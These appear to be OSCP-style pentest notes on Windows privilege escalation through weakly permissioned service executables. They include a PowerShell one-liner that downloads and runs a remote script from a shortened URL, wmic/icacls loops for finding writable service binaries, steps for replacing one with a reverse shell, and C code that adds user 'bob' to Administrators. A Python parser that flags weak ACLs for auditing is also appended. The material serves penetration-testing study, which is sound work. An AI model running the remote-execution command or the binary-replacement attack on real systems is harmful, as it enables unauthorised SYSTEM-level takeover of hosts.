Great Resources:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
Windows Privilege Escalation Methods for Pentesters
dostoevskylabs/dostoevsky-pentest-notes
download and run priv esc script without disk access
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
NOTE: High-priv shell sessions created through weak services die quickly, in about 20-30 seconds, because the Service Control Manager kills a service process that never reports itself as started. Make sure to migrate (Meterpreter) to a new process, or create a new process by opening another shell with nc.exe.
wmic and icacls
Use icacls <path\to\service.exe> to check for insecure permissions such as Everyone:(I)(F) on service executables (the services are listed in services.msc). If a non-privileged user has such access, that user can replace the file with a malicious one.
Automatically find weak service file permissions with the following:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt
for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt
# look for `Everyone:(...)(F)`, `BUILTIN\Users:(...)(F)`, `NT AUTHORITY\Authenticated Users:(...)(M)`, `NT AUTHORITY\Authenticated Users:(...)(C)`, `[Computer]\[Your User]:(...)(F)` in permissions.txt. Transfer it out to Kali if needed, as it will be easier to search there.
Upload a reverse shell executable and replace the original service executable with the malicious one: copy useradd.exe C:\the\path\to\service\binary.exe. The next time the service is started, the malicious executable will run with SYSTEM privileges.
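Added example (not from these notes or the linked guides): a Python parser for the permissions.txt that the loops above produce. It separates each path from its ACEs using the continuation-line indent icacls prints, and reports every ACE that gives a low-privileged principal modify rights on a service binary, so the search step can be automated when auditing a host. The icacls sample, the `Acme Agent` path and the sets of flagged principals and rights are constructed for the example; the one-line fallback regex is a heuristic, and `extra_principals` is where a specific account such as `[Computer]\[Your User]` goes.

```python
import re

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<groups>(?:\([^)]*\))+)\s*$")
# One-line block fallback (heuristic): path ends in a short extension, then a space.
SINGLE_RE = re.compile(r"^(?P<path>.+?\.[A-Za-z0-9]{1,4}) (?P<ace>.+)$")
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users"}
# Simple rights that allow replacing the file ((C) kept because the notes list
# it) plus specific rights that allow write/delete/ACL change.
WRITE_RIGHTS = {"F", "M", "W", "D", "C", "WD", "AD", "WDAC", "WO", "DE"}

def grants_write(groups):
    """True if an allow ACE's parenthesised groups permit modification."""
    parts = re.findall(r"\(([^)]*)\)", groups)
    rights = {r.strip() for p in parts for r in p.split(",")}
    return "DENY" not in parts and bool(rights & WRITE_RIGHTS)

def parse_icacls(text):
    blocks = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if line.startswith(" ") and blocks:
            blocks[-1].append(line)  # continuation line of the current file
        else:
            blocks.append([line])    # "path first-ACE" starts a new file
    for block in blocks:
        if len(block) > 1:  # icacls indents continuation lines by len(path)+1
            indent = len(block[1]) - len(block[1].lstrip(" "))
            path, aces = block[0][:indent - 1], [l[indent:] for l in block]
        else:
            m = SINGLE_RE.match(block[0])
            path, aces = (m["path"], [m["ace"]]) if m else (block[0], [])
        for ace in aces:
            if (m := ACE_RE.match(ace)):
                yield path, m["who"], m["groups"]

def weak_service_binaries(text, extra_principals=()):
    risky = LOW_PRIV | {p.lower() for p in extra_principals}
    return [(p, who, g) for p, who, g in parse_icacls(text)
            if who.lower() in risky and grants_write(g)]

def icacls_block(path, aces):  # constructed sample in icacls's output layout
    pad = " " * (len(path) + 1)
    return ("\n".join([path + " " + aces[0]] + [pad + a for a in aces[1:]])
            + "\n\nSuccessfully processed 1 files; Failed processing 0 files\n")

SAMPLE = (icacls_block(r"C:\Program Files\Acme Agent\agentsvc.exe",
                       [r"NT AUTHORITY\SYSTEM:(I)(F)", r"BUILTIN\Users:(I)(RX)",
                        "Everyone:(I)(F)"])
          + icacls_block(r"C:\Tools\svc.exe", ["Everyone:(F)"]))
```

Run it on a real permissions.txt with `weak_service_binaries(open("permissions.txt").read())`; every path it returns is a binary that should have its ACL tightened to Administrators/SYSTEM write only.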
Tools:
icacls
Alternatively, make the current low-priv user an Administrator. Prepare (on Kali) a malicious executable that gives bob administrative rights:

```c
#include <stdlib.h>

/* When run as SYSTEM by the service, adds the local user "bob" to Administrators */
int main(void)
{
    int i;
    i = system("net localgroup administrators bob /add");
    return i;
}
```